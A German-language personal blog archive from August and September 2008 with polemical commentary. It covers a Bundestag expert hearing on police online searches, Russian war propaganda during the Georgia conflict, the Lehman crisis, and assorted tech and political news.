[Auf die Frage, wozu sie die Online-Durchsuchung brauchen] Bei den Sauerländern haben wir verschlüsselte Dateien gefunden, die haben wir bis heute nicht entschlüsseln können! [Überraschung!!1!]
Kritik [an den neuen Geheimdienstbefugnissen] verhöhnt die Polizei, die in den Ländern mit diesen Befugnissen hunderte von Menschenleben gerettet haben.
[Angesprochen auf den Blödsinn, den sein Abgesandter beim Verfassungsgericht erzählt hat] Das war ein unautorisierte Aussage eines Mitarbeiters!
Völlig klar, wenn der Ziercke jemanden observieren läßt, dann ist das ein Verbrecher! Das hat dann vermutlich die Precog-Abteilung herausgefunden oder so. Ziercke hat sogar den Sprengstofflaster zur WM noch mal zitiert, der ja angeblich aus dem Baltikum kommen und Deutschland per schmutziger Bombe verstrahlen sollte, sich dann aber schnell als komplette Fiktion herausstellte.
Ach, ein Highlight noch, von Prof Kutscha. Der hat mir ja sehr gut gefallen, der Mann. Der hat u.a. argumentiert, dass wir die selben Argumente ("unverzichtbar!", "Untergang des Abendlandes droht, wenn wir das nicht kriegen!!1!") schon beim großen Lauschangriff gehört haben, und heute benutzen sie das nur ein paar Mal im Jahr und das ist völlig unwichtig als Maßnahme. Und er hat die mangelnde Definition von "internationalem Terrorismus" sehr anschaulich illustriert, indem er argumentierte, da seien unter anderem Wirtschaftsgüter betroffen (das habe ich ja damals als "Onlinedurchsuchung bei Sachbeschädigung" kritisiert), und daher könne man argumentieren (er zitierte da auch noch ein EU-Gerichtsurteil in die Richtung, dass Streik als Handelshemmnis darstellte), dass von Gewerkschaften ausgerufene Streiks Terrorismus seien und unter dieses Gesetz fielen. Fand ich so toll, dass ich mich bei dem in der Kaffeepause persönlich bedankt habe, dass er das gebracht hat.
Oh, einen habe ich noch. Einer der SPD-Email-Ausdrucker sprach da davon, bei den Sauerländern hätten sie drei Tetrabyte an Daten gefunden (Danke an slowtiger für den schönen Photoshop). Bwahahahaha
Update: Lacher am Rande: es kam die Frage auf, warum wir nicht einfach die Formulierungen des Bayerntrojaner-Gesetzes nehmen, woraufhin sich die Sachverständigen unisono einig waren, dass das auch ganz offensichtlich verfassungswidrig ist.
Übrigens, mein persönlicher Held der Veranstaltung ist der Prof Geiger, der am Anfang ruhig und gesetzt rüberkam, aber immer schön seriös alle Punkte zerlegt hat. Der war mal BND-Präsident, was mich ja doch schockiert hat, weil der der einzige war, der da mit moralisch-ethischen Argumenten gegen das Gesetz kam. Der sprach auch als einziger ein Verwertungsverbot an, das ich ja auch gefordert hatte, für den Fall, dass sie Gefahr im Verzug brüllen und nach drei Tagen der Richter meint, der Einsatz sei illegal. Dafür habe ich ihm auch in der Mittagspause persönlich gedankt, und daraufhin wurde er nach der Mittagspause echt zum Tiger und kam da mit geradezu missionarischen Argumenten ala "Stellen Sie sich mal vor, SIE seien von so einem Gesetz betroffen, was für einen Rechtsschutz genießen Sie denn dann noch?" Erschütternderweise stießen diese Argumente bei den Abgeordneten auf völliges Unverständnis, so meinte der eine CDU-Apparatschik dazu "Sie tun ja geradezu so, als würden wir diese Maßnahmen gegen Unschuldige einsetzen!1!!". Äh, ja, genau das ist die Gefahr, Sie Knalltüte! Also der Geiger hat mir sehr gut gefallen. Wenn ich einen Orden verleihen könnte, er würde ihn kriegen.
Heise hat auch eine Meldung dazu, aber die liest sich fast als wäre der Herr Krempl bei einer anderen Anhörung gewesen :-)
Die Tagesschau findet auch, dass der Konsens war, dass das verfassungskonform war, und zitiert dafür ausgerechnet Prof Gusy, der da länglich argumentierte, dass man Artikel 13 dafür ändern müsse. Und von all den Kritikpunkten zitieren sie einen organisatorischen ("könnte mit den Zuständigkeiten der Bundesanwaltschaft kollidieren") und einen relativ leicht widerlegbaren ("könnte den falschen Computer treffen"). Pfui, Mainstream-Medien, Pfui! Noch schlimmer ist der erste Artikel dazu, wo sie gar keine Bedenken gehört haben (die müssen sich da was in die Ohren gesteckt haben).
Und wenn tagesschau.de wenigstens halbwegs seriös rüberkommt mit ihrer Falschberichterstattung, dann hat der Stern gar keine Hemmungen, dem Volk ins Gesicht zu lügen. Kein einziger der Staatsrechtler hat den Gesetzentwurf als verfassungskonform bewertet! Nicht mal die beiden CDU-Experten (der Heckmann und der Möstl, der schon vom Dialekt her klang als lehre er in Pullach)! Der Möstl hat immerhin für einige Punkte hanebüchene Rechtsauffassungen zu konstruieren versucht, wieso man möglicherweise für diesen Punkt ohne Verfassungsänderung auskommen könnte, bis es dann das Verfassungsgericht wieder einkassiert. Aber nicht mal DER hat sich da hingestellt und den Entwurf als verfassungskonform bezeichnet. Krass.
Kai Raven war auch da und hat seine Notizen geblogt. Seine Einschätzung zu Prof Gusy teile ich übrigens, der kam mir vor wie ein Hacker im Geiste, der auf Fragen, ob $XY verfassungskonform sei, mit bizarrologischen Konstruktionen antwortete, was man kunstvoll wie auslegen müsse, um da eventuell argumentativ in Richtung Verfassungskonformität kommen zu können. Bei mir blieb der Eindruck zurück, dass das alles in seinen Augen nicht verfassungskonform ist und man da größere Verrenkungen machen müsste, um das überhaupt verargumentieren zu können, aber offenbar sahen das die Experten-Reporter vom Stern anders. Bemerkenswert an dem Geiger war, dass er dieses Mal kraftvoll gegen das Richterband argumentierte, indem er am Ende aufzählte, wer bei einem Richterband (womöglich mit Dolmetschern) die eigentlich absolut geschützten intimen Kernbereichsdetails zu Gesicht bekäme.
[l] Bankendomino: Angesichts der vermutlichen Pleite von Lehman Brothers hat Wall Street am Sonntag eine "emergency trading session" gemacht, damit der Markt sich am Montag in all der Panik nicht völlig chaotisch verhält. Leider haben sie das offenbar erst Sonntag nachmittag entschieden, und das war zu kurzfristig, daher kam da so gut wie keiner. Aber da sieht man mal, wie da der Arsch auf Grundeis ist.

Sun Sep 14 2008

[l] Nach Musharraf haben die Amis ja den Hund losgekettet und sind da einfach über die Grenze marschiert mit ihren Truppen, um "die Terroristen" zu verfolgen. Damit haben sie offenbar in Pakistan keine Freunde gemacht: Pakistans Armee hat jetzt Order, Invasoren (d.h. die Amis aus Afghanistan) zu töten, wenn sie die Grenze überschreiten. Wird vermutlich nicht wirklich passieren, aber Pakistan ist offenbar ernsthaft verärgert gerade.
[l] Jetzt haben sie der Palin auch noch Vetternwirtschaft nachgewiesen. Außerdem war sie (wie Bush) mehr ab- als anwesend im Amt. So langsam stellt sich ja die Frage, ob die eigentlich jemals etwas richtig gemacht hat in ihrer Karriere.
[l] Und noch eine Apple-Nummer: Nach vier Platten-Ausfällen erklärt der Apple-Support einem Musiker, das läge daran, dass er auf Konsumenten-Hardware (einem $1500 Macbook) Garageband (ist im Lieferumfang) benutzen würde. Consumer-Hardware sei nicht dafür gemacht, große Dateien zu schreiben, und da sei er selbst Schuld, er soll halt eine externe Platte verwenden.
I told him I was a musician and I recorded using Garageband in addition to surfing the internet, etc. He told me that Macbooks are consumer level machines and that often they can't handle writing big files like the kind Garageband uses. He said I should use an external hard drive for recording with Garageband.
He refused to replace the machine and when I asked for the number for customer relations, he game me a number which was actually the Apple Care hotline.
Wieso kaufen Leute von dieser Firma?! (via)

Fri Sep 12 2008

[l] Hahahaha, die Russen haben ihre Propaganda verkackt: Auf dem "Beweisfoto", dass die Amis Sabotagetraining mit den georgischen "Friedenstruppen" gemacht haben sollen, ist die US-Fahne falsch herum drauf. Ooooder sie haben sich da nur an El Presidente bei den olympischen Spielen gehalten. Das passiert halt, wenn die US Army ihre Uniformen billisch-billisch von den Chinesen nähen lässt. :-)
Update: Ich ziehe alles zurück und behaupte das Gegenteil: offenbar ist das Absicht und tatsächlich bei US-Uniformen so. Bizarr, ist mir noch nie aufgefallen. Hier gibt es sowas wie ne FAQ dazu. (Danke, Jörg, Ralf)

Tue Sep 9 2008

[l] Ich lasse das mal meinen Co-Fnord Frank sagen: Im Moment sieht alles nach vorgezogenen Neuwahlen aus, wo die CDU sich dann die Mehrheit holen will. Die SPD hat davon Wind gekriegt und macht daher jetzt diese Hauruck-Aktion. Münte ist jetzt schon zu alt, das war echt ein Griff ins Klo, und Steinmeier hat zu viel mit Geheimdiensten zu tun gehabt, um da keine Skelette im Keller zu haben. Ich persönlich vermute daher, dass die CDU sich über Steinmeier freut, und wenn es für eine Mehrheit nicht reicht, dann machen sie mit dem, was sie mit Schily gemacht haben. Der hat sich ja auch immer gehetzt umgeguckt auf öffentlichen Veranstaltungen, als ob da jemand mit einem Koffer Kompromat hinter ihm steht.

Mon Sep 8 2008

[l] Der London Stock Exchange ist für 7 Stunden ausgefallen. Da steht leider nicht, was da genau kaputt gegangen ist, aber wenn ich mal raten müsste, würde ich auf die Software tippen:
The new technology platform has been developed using the Microsoft .NET Framework, with support from Microsoft and Accenture
Da haben sich ja die richtigen Technologien und Leute zusammen gefunden…
Update: Die Betreibergesellschaft sagt, es war das Netz, nicht die Software. Halte ich für unwahrscheinlich, denn 1. dauert in solchen Fällen die Reparatur keine 7 Stunden, und 2. hat man gerade in solchen Setups alles mehrfach redundant am Start. Besonders peinlich ist ja, dass Microsoft fett damit Werbung gemacht hat, die Londoner Börse habe wegen der Zuverlässigkeit Windows statt Linux gewählt. Bwahahahaha
Oh und der verschwörungstheoretische Aspekt ist auch nicht zu verachten: das war der Tag, wo die Amis Fannie Mae und Freddie Mac verstaatlicht haben.

Wed Sep 3 2008

[l] Noch was zu Google Chrome. Es kommt mit einer praktischen Keylogger-Funktion! Es handelt sich wohl um eine Autocomplete-Funktion, die man auch abschalten kann, aber angesichts der groben Frechheit der EULA kann ich nur annehmen, dass sie das absichtlich opt-out gemacht haben.
Da gehörte schon ganz schön Anstrengung dazu, noch schlimmer als Microsoft auszusehen mit den EULAs und dem Nach-Hause-Telefonieren. Gratulation, Google, das kann nicht einfach gewesen sein. Wieso wollen eigentlich alle großen Firmen über kurz oder lang das größe Arschloch am Markt sein? Ist das inhärent?

Tue Sep 2 2008

[l] Die Antifa-Zecken kommen langsam mit der Auswertung der Blood and Honour Daten voran. Erster Hammer: Einer der Accounts gehört offenbar Herrn M. S. von der Jungen Union. Die Junge Union war schon immer eine der widerlichsten Vereinigungen Deutschlands, wenn sie mit ihren Äußerungen zum politischen Tagesgeschehen schon mal an den Eifer der HJ erinnert. Mich wundert das überhaupt nicht. Mich wundert bloss, dass die noch nicht zugemacht wurden, denn von der ach so furchtbaren NPD sind die nicht weit entfernt.

Mon Sep 1 2008

[l] Das war so sicher wie das Amen in der Kirche: Gazprom macht mal eben den Gashahn Richtung Europa zu, um die Pipeline zu warten. Und, mal unter uns, hätte ich auch gemacht an ihrer Stelle. Was sollen die Russen gerade auch sonst tun. Die EU tut so, als hätte sie da irgendwelche Druckmittel in der Hand wegen der Georgienkrise, und da muss Russland mal eben zeigen, wer hier der Chef ist. Europa hat für solche Fälle Gasreserven, da passiert jetzt also nichts wirklich, denn die Sache ist auf 2 Tage beschränkt, aber es ist ein klarer Wink mit dem Zaunpfahl.
Update: Es funktioniert: EU verschiebt Russland-Gespräche :-)

Wed Aug 27 2008

[l] Ach du meine Güte: Die "Welt" läßt einen der Ex-Berater des US-Verteidigungsministers bei sich schreiben, und der nutzt das zu einer einzigartigen Agitprop-Attacke mit dem Namen "Warum Bush die Welt sicherer gemacht hat". Ich fasse den Inhalt nicht zusammen hier, das müsst ihr selber lesen. Ich glaube ja, dass die wirklich glauben, was sie da schreiben. Das ist deren Gedankengut. So redet sich Bush ein, dass er da das Richtige tut. Na gut, ein bisschen was zitiere ich doch:
Wird die korrupte Unfähigkeit der degenerierten indischen Administration den wirtschaftlichen Fortschritt des Landes abwürgen? Wird Russland auf Putins autoritärem Kurs weiterfahren, oder wird es als einzigartiges Beispiel einer zentral verwalteten Räuberkultur weiterexistieren? Wird die zunehmende Dezentralisierung Europas in Regionen und Quasistaaten wie Katalonien und Schottland die alten Nationalstaaten ausreichend schwächen, um die Entwicklung einer starken paneuropäischen Regierung zu ermöglichen? Das würde die USA schwächen, die derzeit als Europas einzig funktionierender Koordinator in militärischen und diplomatischen Angelegenheiten dienen.

Tue Aug 19 2008

[l] Es gibt mal wieder lustige Neuigkeiten vom Pirate Bay. Das IOC hat den Justizminister von Schweden angeschrieben, er soll doch mal verhindern, dass man beim Pirate Bay Olympia-Videos kriegt. Daraufhin hat sich TPB zu The Beijing Bay umbenannt, hat ein neues Logo gemacht, und das Logo linkt auf die Olympia-Videos.

Mon Aug 18 2008

[l] Das ehemalige Nachrichtenmagazin ist ja seit langem für seine unerträgliche Transatlantik-Arschkriecherei und seine Pornorama-Tittenspalte bekannt, aber was sie heute bringen, das schlägt dem Fass den Boden aus: "Qaida-Fans bejubeln den Abgang ihres Erzfeinds". Nanu? Erzfeind von Al Quaida? Wen könnten sie meinen? Doch sicher nicht Musharraf, dessen Geheimdienst ihnen die US-Waffen und -Kohle geliefert hat, und der sie in den Höhlen im Grenzgebiet vor dem Zugriff der "internationalen Schutztruppen" in Nordafghanistan schützt? Und es ist mal wieder dieser "Yassin Musharbash", der schon häufiger durch unfaßbar schlecht gemachte Propaganda aufgefallen ist. Können die, wenn sie mir ins Gesicht lügen, nicht wenigstens geringste Qualitätsstandards halten dabei? Ich versuche ja, das nicht persönlich zu nehmen, aber mich erstens anlügen, und mir zweitens mit so schnoddriger Inkompetenz zeigen, dass sie mich für zu blöde halten, das zu merken, tut mir leid, das nehme ich persönlich.
Aber so ist das halt. Das gemeinsame Terrorpanikzentrum von SpOn und dem BND mußte im Sommerloch mal wieder eine Runde Panik schüren. Seufz.

Fri Aug 15 2008

[l] Tut mir leid, noch eine Kriegspropaganda-Meldung, aber an der komme ich nicht vorbei:
Das georgische Volk sei zu Zombies gemacht worden und verstehe nicht, was sich in seinem Land abspiele: "Alle russischen Medien sind abgeschaltet, es gibt keine richtigen Informationen", so Chubutschia.
"Die georgischen Soldaten glaubten, in eine Übung zu ziehen, landeten aber mitten in einem Krieg."
Das sagt der Verbandsvorsitzende der Exil-Georgier in Russland, also eine völlig neutrale, unvoreingenommene Quelle. Bwahahaha.

Sat Aug 9 2008

[l] Oh Mann, die Kriegspropaganda geht weiter. Da bleibt kein Auge trocken!
- Russlands Friedenssoldaten in Zchinwali bekamen Unterstützung.
  Ein Bataillon der 58. Armee des Nordkaukasischen Militärbezirks hat sich zum Lager der russischen Friedenstruppen am Rande des südossetischen Verwaltungszentrums Zchinwali durchgekämpft.
  Wie RIA Novosti im Stab der Gemeinsamen Friedenstruppen erfuhr, brachten die Soldaten Lebensmittel, Medikamente und Munition mit und sind jetzt dabei, Verletzte zu evakuieren.
  Ist das nicht großartig? *träneverdrück*
- Und gleich noch mal fett auf die Amis draufkloppen: "Saakaschwili: Lage in Georgien ist Moment der Wahrheit für Präsident Bush". Tja, der hat gerade die Hände voll, und bis die Amis vor Ort sind, haben die Russen Georgien plattgemacht.
- Und noch ein bißchen Gerechten Zorn zeigen: "Medwedew: Schuldige an humanitärer Katastrophe in Südossetien müssen Verantwortung tragen". Nee, klar.
- EIL - Russlands Außenamt: Kiew hat Tiflis zur bewaffneten Intervention ermuntert. Das halte ich für Unsinn. Die Ukraine hat selber genug Ärger mit den Russen. Die Russen bringen die Ukraine jetzt ins Gespräch, weil die in einer ähnlichen Situation wie die Georgier sind. Das ist der Wink mit dem Zaunpfahl. Benehmt euch, oder euch blüht das selbe!
- "EIL - Zchinwali von georgischen Truppen befreit". Habt ihr mal Risiko gespielt? "Befreien Sie Südamerika!"
- Russland schickt die Luftlandetruppen.
- "Strafverfahren wegen Mord an russischen Friedenssoldaten eingeleitet". Noch mal drauf hauen, dass wir die Guten sind hier!1!!
- "EIL - Sitzung des Sicherheitsrates Georgiens einberufen - Verhängung des Kriegszustands geplant". Denn es sind DIE ANDEREN, die hier eskalieren!1!! Wir verteidigen uns bloß!
- "EIL - Georgiens Innenministerium: Russischer Pilot aus abgeschossenem Kampfflugzeug wird verhört". Na da bin ich ja mal gespannt. Georgien bemüht sich auch um die Darstellung, dass sie hier die Guten sind.
- EIL - Saakaschwili beschließt Verhängung des Kriegszustandes.
Update: Krass, geht weiter: Abchasien nutzt die Gelegenheit und greift Georgien auch an. Und Russland drückt ganz doll auf die Propaganda-Tube und bezeichnet die Georgier als Terroristen.

Fri Aug 8 2008

[l] Australien hat die mit 15 Millionen Pillen größte Ecstacy-Beschlagnahme der Welt gemacht. Kam spannenderweise aus Italien, nicht aus Israel. Passend dazu: Frankreich beschlagnahmt eine Tonne Kokain auf Segelboot vor Martinique.
[l] Habt ihr diesen Georgien-Krieg gerade mitgekriegt? Das ist eine hochinteressante Angelegenheit. Die Russen sind ja inzwischen sehr empfindlich bezüglich ihrer alten Republiken und der ganzen USA-gesponserten Revolutionen. Die Strategie ist wie in alten Zeiten eine Konterrevolution, im Fall Georgien hat sich Abchasien abgespaltet und die Russen haben "Friedenstruppen" entsandt, die da für die Einhaltung des Waffenstillstands sorgen wollen.
Für Georgien ist das natürlich ein Affront.
Die Russen haben auch die Abspaltung Südossetiens vorangetrieben. Aus Sicht Georgiens ist ja klar, was da gerade passiert. Es gab da die ganze Zeit schwelende Scharmützel, aber jetzt ist da der Konflikt zwischen Georgien und Südossetien ausgebrochen. Es ist unklar, wer da "angefangen" hat, aber es wollen sich natürlich beide Seiten als die Angegriffenen darstellen. Laut Ria Novosti (nicht unbedingt eine unbefangene Nachrichtenquelle in dem Fall) haben wohl die Georgier angegriffen, die Russen sind dann als Vermittler eingeschritten, und dann hat Georgien "unilateral" den Soldaten befohlen, nicht zurück zu schießen. Wikipedia hat ein paar Absätze zum aktuellen Konflikt. Insbesondere hat Russland halt nur auf einen Vorwand gewartet, um sich da gegen Georgien einschalten zu können. Der aktuelle Stand ist, dass die Russen behauptet haben, Georgien haben die russischen "Friedenstruppen" beschossen und dabei einige Russen getötet. Daraufhin haben die Russen offenbar ein paar Bomber losgeschickt und ein paar Ziele in Georgien plattgemacht. Daraufhin hat Georgien die Generalmobilmachung ausgerufen.
Ich kann euch nur empfehlen, mal ein bisschen bei Ria Novosti herum zu stöbern, das ist hervorragende Kriegspropaganda (und die beste Propaganda ist ja immer die, bei der im Kern ein bisschen Wahrheit dabei ist).
Hier sind mal ein paar Meldungen, um euch ein Gefühl zu geben:
- BLITZ - Georgien beschießt russische Kasernen
- BLITZ - Georgiens Truppen beschießen gezielt russische Kasernen in Zchinwali
- BLITZ - Russische Friedenssoldaten bei georgischem Beschuss getötet
- Donkosaken erwägen Unterstützung von Südossetien
- EIL - Tiflis ruft Abchasien zum Verzicht auf Einmischung in Südossetien-Konflikt auf
- BLITZ - Saakaschwili: Südossetiens Hauptstadt weitgehend unter georgischer Kontrolle
- EIL - Saakaschwili verkündet allgemeine Mobilmachung in Georgien
- EIL - Putin: Georgiens Aggression wird erwidert - USA und China gegen Krieg in Südossetien
- Georgien bestreitet Beschuss der russischen Friedenstruppen
- OVKS: Georgien hat Masterplan zum Südossetienkrieg (interessant, btw!)
  Die OVKS hält es für zynisch, den Krieg am Tag der Eröffnung der Olympischen Spiele anzufangen. Doch der Beginn der Olympischen Spiele sei kaum in der Lage, die Weltgemeinschaft von den Ereignissen in Südossetien abzulenken, heißt es in der Mitteilung.
- (Beim Spiegel:) Abchasien droht Tiflis mit zweiter Front (Tiflis ist die Hauptstadt von Georgien)
- Georgien: Tiflis ist nicht der Aggressor
- Russland: Berichte über Abschuss eines russischen Kampfjets durch Georgien sind Schwachsinn
- Schwarzmeerflotte will Flüchtlingen aus Südossetien helfen
- In bester "Wag The Dog" Manier hat Ria Novosti dann auch eine Fotoreihe über Flüchtlinge aus Südossetien, die sich nach Nordossetien (in Russland) gerettet haben (denn die Russen, das sind die Freunde, zu denen man im Notfall fliehen kann)
- Krieg in Südossetien: Georgische Scharfschützen verhindern Erste Hilfe für Verwundete (ja, SO macht man Kriegspropaganda!!)
- Saakaschwili: Georgien ist Opfer der russischen Aggression (brillianter Schachzug, das zu tickern, denn nach all den Meldungen davor sieht das jetzt aus als sei der Premier von Georgien völlig weggetreten und weltfremd)
- Dramatischer Hilferuf aus Südossetien: Russland, rette uns vor der Vernichtung! (OK das war jetzt ein bisschen stark aufgetragen, da hört man die Pravda im Hintergrund)
- Moskau dementiert Berichte über russische Bomber über Georgien
- BLITZ - Russland nimmt Bürger und Friedenssoldaten in Südossetien in Schutz
- Moskaus Polizei verstärkt Kräfte vor georgischer Botschaft (der gerechte Volkszorn entläd sich da sonst!1!!)
- Freiwillige aus Südrussland zu Kampfeinsatz in Südossetien bereit (zur Verteidigung des Vaterlandes und ihrer Brüder und Schwestern!1!!)
Und so weiter. Ganz großes Tennis.
Update: Lacher am Rande: "Internet-Krieg: Hacker-Attacken auf südossetische Webseiten". Und offenbar sind auch die meisten Webseiten der georgischen Regierung offline.
[l] Mein ATI-Problem habe ich inzwischen so halb gelöst. Mit dem radeon und dem radeonhd Treiber für X kriege ich jetzt Bild, auch in der richtigen Auflösung, und das performt auch gut, aber ich habe kein xvideo und kein 3d. 3d interessiert mich auch nicht, aber leider hat ATI das alte xvideo-Zeug nicht mehr in Hardware gemacht.
Nun sagen ja die Dokumente da draußen, dass die neuen ATI-Karten supported werden, weil ATI eine BIOS-Abstraktion namens Atom-Bios hat. Da stellte sich mir die Frage, wieso dann nicht auch das ganze 3d-Zeug über Atombios abstrahiert wird, denn die 2d-Performance von X ist echt amtlich, das fühlt sich an, als hätten die 2d Hardware-Acceleration. Stellt sich raus: haben sie nicht. Die ganze Performance kommt daher, dass sie im Hauptspeicher eine Kopie des Framebuffers haben, dort rum manipulieren, und dann die Kopie in den Videospeicher kopieren. Das ist für Dinge wie "großes Fenster verschieben" VIEL schneller als die Daten aus dem VRAM zu lesen und an anderer Stelle zurück zu schreiben. Die haben gar keine 2d-Beschleunigung auf meiner Grafikkarte. Das hat mich schon echt erstaunt, denn wer mal vesafb oder so benutzt hat, was ja auch keine 2d-Beschleunigung hat, der wird sehen, dass das furchtbar langsam ist. Und so habe ich mal die radeonhd-Leute befragt heute, und die haben mir erklärt, der VESA-Treiber habt keinen shadowfb und sei deshalb so langsam.
Tja, jedenfalls heißt das für mich, dass ich auf xvideo noch eine Weile warten muss, denn da haben sie die 3d-Specs noch nicht, und auf aktuellen ATI-Karten läuft Video eben über die 3d-Engine. Da muss ich dann wohl durch jetzt. Seufz.

Thu Aug 7 2008

[l] Ab demnächst beweisen sie mit Fingerabdrücken nicht nur, wer da war, sondern auch was der vorher gemacht hat. Finde ich persönlich jetzt nicht so überraschend, Massenspektrometer halt. Aber sie haben es wohl soweit vereinfacht, dass jeder Depp die Daten am Tatort aufnehmen kann. Da wird sich der Schäuble drauf stürzen. Mehr Material für seine Stasi-Datenbanken.

Sat Aug 2 2008

[l] Cheney hat überlegt, ob sie nicht Navy Seals als Iraner verkleiden und in der Straße von Hormus abschießen sollen, um einen Irankrieg zu provozieren, natürlich. Am Ende haben sie es nicht gemacht, weil …
And it was rejected because you can’t have Americans killing Americans.
D.h. wenn das, sagen wir, ein paar "Freiwillige" Gitmo-Insassen sind, dann ist das OK?

Wed Jul 30 2008

[l] Gelegentlich sieht man etwas, das einen so direkt überzeugt, dass man das sofort auch haben will. So ging mir das heute mit diesem Oscon-Video, wo sie jeden Vortragenden für ein paar Sekunden erzählen lassen, worüber ihr Talk ist. Das will ich für den 25C3 auch haben. Ich habe nur im Moment keine Ahnung, wie sie die Metadaten gemacht haben, die unten immer die URLs einblenden. Wer kennt sich mit Flash genug aus, um sowas nachzubauen? Jetzt müsste man das nur noch VOR der eigentlichen Konferenz fertig haben, das finde ich den idealen Kongressplaner.

Tue Jul 29 2008

[l] Kurzer Hinweis, wieso Berlin geil ist: Die Gemüseschlacht zwischen Unterfriedrichshein (Kreuzberg) und Ostkreuzberg (Friedrichshain). Als ordentliche Demonstration angemeldet, und gesponsort von ALBA, einem Müllentsorger, der das am Ende wieder sauber gemacht hat. Bei den Siegern aus Friedrichshain gibt es eine Linkliste auf die Presseberichterstattung zum Durchklicken, und hier ist die Webseite der Kreuzberger. Es gibt auch eine Wikipedia-Seite dazu (Überraschung!!1!) und sogar eine Nebenschlacht zwischen Neuköllnern und Kreuzbergern. Und natürlich gibts auch bei Youtube was. Berlin rockt!

Sun Jul 27 2008

[l] Ich habe neulich einen Film namens King Corn geguckt, wo zwei Stadtmenschen sich entscheiden, einen kleinen Acker mit Mais zu bepflanzen, um mal zu lernen, wo das Essen so herkommt. In dem Film geht es dann darum, wie man Mais nur unter Verlust anbauen kann, aber die Regierungs-Subventionen das profitabel machen am Ende, und wie Mais vor allem in der Rinderzucht verwendet wird, und zur Herstellung von High Fructose Corn Syrup, das ist in den USA statt Zucker das Süßmittel der Wahl für industrielle Lebensmittelherstellung.
Über HFCS kann man alleine stundenlang schreiben, wie ungesund das ist, da stellen sie in dem Film ein winziges bisschen von her aus ihrem Mais, nachdem sie den Mais mal probiert haben (einfach roh vom Feld genommen und reingebissen) und feststellten, dass der gar nicht schmeckt — weil die US-Maissorte, die die alle anbauen, auf maximalen Ertrag optimiert wurde, nicht auf Geschmack, das kann man quasi nur in HFCS umwandeln und an Rinder verfüttert, und es stellt sich auch noch raus, dass die Rinder daran verenden. Gut, erklärt ihnen ein Agrarforscher in dem Film, dass die Rinder so jung geschlachtet werden, denn ansonsten würden die an ihrer Mais-Diät qualvoll verenden.
Insgesamt ein deprimierender Film. Zwei Dinge fand ich besonders auffallend. Erstens dass die überhaupt nicht überlegt haben, ob sie Genmais haben wollen oder nicht — das macht man einfach so. Und das Zeug ist immens teuer. Ich war schockiert, wie teuer das ist. Und das zweite war, was die für ihren Dünger ausgeben. Ich hatte ja keine Vorstellung! Ungefähr die Hälfte ihrer Kosten war nur Düngemittel! Und die mußten ja das Feld mieten, die Geräte leihen, den Mais kaufen, …
Lange Rede, worauf ich eigentlich hinaus wollte: Dünger wird ja auch aus Öl gemacht. Und Öl ist gerade rekord-teuer. Die nächste Krise, die da auf uns zukommt, ist eine Preisexplosion beim Dünger. Ich habe da seit einer Weile mal die News beobachtet, und jetzt kam da mal eine Meldung zu rein:
Costs to get crops in the ground will jump by about a third in 2009, fueled by fertilizer prices expected to surge 82 percent for corn and 117 percent for soybeans, said Gary Schnitkey, an agricultural economist who conducts the annual survey of input costs.
Autsch!
“Roughly 80 percent of the cost of producing nitrogen fertilizer is natural gas, so as natural gas costs have gone up so have the costs of those inputs,” he said. “Phosphorus and potassium are mined, and as energy costs increase, mining costs increase.”
So sieht das aus. Haltet mal die Augen offen, da wird man sicher bald die Auswirkungen von zu sehen beginnen. Ich prognostiziere mal Hamsterkäufe, sobald sich die Einsicht breit macht, dass das bald krass teurer wird alles.
Update: es gibt Widerspruch, dass Dünger aus Öl gemacht wird. Offenbar ist es eher so, dass man nur sehr viel Energie (aus Erdgas) für die Herstellung braucht, und das daher an den Ölpreis gekoppelt ist.

Tue Jul 22 2008

[l] Das erste Militärtribunal-Verfahren mit einem Guantanamo-Insassen ist gestartet. Dabei sind unter Folter gemachte Aussagen (und Hörensagen, wenn ich das mal anmerken darf) zulässig. Kurz: ein Schauprozess. Eine Farce. Es geht um den Fahrer (!) von Bin Laden. Aber da muss man sich keine Sorgen machen, die USA zeigen, wie ernst sie das nehmen:
"Ich bin unschuldig": Mit dieser knappen Erklärung von Salim Ahmed Hamdan, übermittelt durch seinen Anwalt, und mit der Auswahl von Geschworenen hat im neuen Gerichtstrakt des Gefangenenlagers Guantánamo Bay auf Kuba das erste amerikanische Militärgerichtsverfahren seit dem Zweiten Weltkrieg begonnen. Dieser Trakt wurde trotzig "Camp Justice" getauft - wie "Gerechtigkeit".
Na dann kann da ja nicht viel schief gehen.

Sat Jul 12 2008

[l] Und noch eine Polizeibefragung von Olmert. Wer sich fragt, wann die mal mit dem Befragen aufhören und mit dem Verhaften anfangen, der ist nicht alleine:
A police source said Thursday that the allegations are extremely serious and that an ordinary citizen would have been arrested by now had such accusations been leveled.
Und es gibt auch endlich mal ein paar Details, was er denn nun gemacht haben soll. Er hat offenbar für Reisen Spenden entgegen genommen, aber so halt diverse Organisationen (von behinderten Kindern über Yad Vashem sind alle dabei) für die selben Reisen bezahlen lassen, und den (offenbar substanziellen) Überschuss für privaten Familienurlaub benutzt. (Danke, Lieven)

Sun Jul 6 2008

[l] Ich könnte mich ja immer amüsieren, wenn abgehalfterter Verlierer-Politiker am Ende ihrer illustren Versager-Karriere noch kurz ein-zwei gute Taten vollbringen, um wenigstens etwas positives hinterlassen zu haben. Bei US-Präsidenten ist das z.B. seit langem üblich. Clinton hat in den letzten Tagen seiner Karriere noch schnell ein paar Umweltschutzgesetze gemacht, bei denen klar war, dass sein Nachfolger sie sofort rückgängig machen würde. Aber Clinton kann so sagen, er habe was für die Umwelt getan. Für immerhin rund eine Woche :-)
Auch der Tiefensee ist offenbar gerade an diesem Punkt in seiner Karriere angekommen: Nachdem er alles andere verkackt hat, will Tiefensee jetzt Windparks im Meer bauen. Das wird sicher an irgendwelchen Bedenkenträgern scheitern, und Tiefensee kann dann sagen, er habe es immerhin versucht. Und am Ende sind wir keinen Schritt weiter. Wie immer.
[l] Von den Terrorismus-Vorwürfen, die sie bei G8 für die ganzen illegalen Zugriffe genutzt haben, ist nichts mehr übrig. Das Landgericht Flensburg hat das alles zusammen gestrichen wie unsere Junta die Arbeitslosenhilfe. Gut, damit war zu rechnen, aber mich ärgert mal wieder die Botschaft:
Der Rechtsexperte der FDP-Bundestagsfraktion, Max Stadler, kritisierte, es gebe bei den Strafermittlungen offenbar die Tendenz, den relativ offen formulierten Terrorismusparagrafen 129a weit auszulegen. Deshalb sei es gut, dass die richterliche Kontrolle funktioniere und einer zu weiten Auflage Grenzen gesetzt würden.
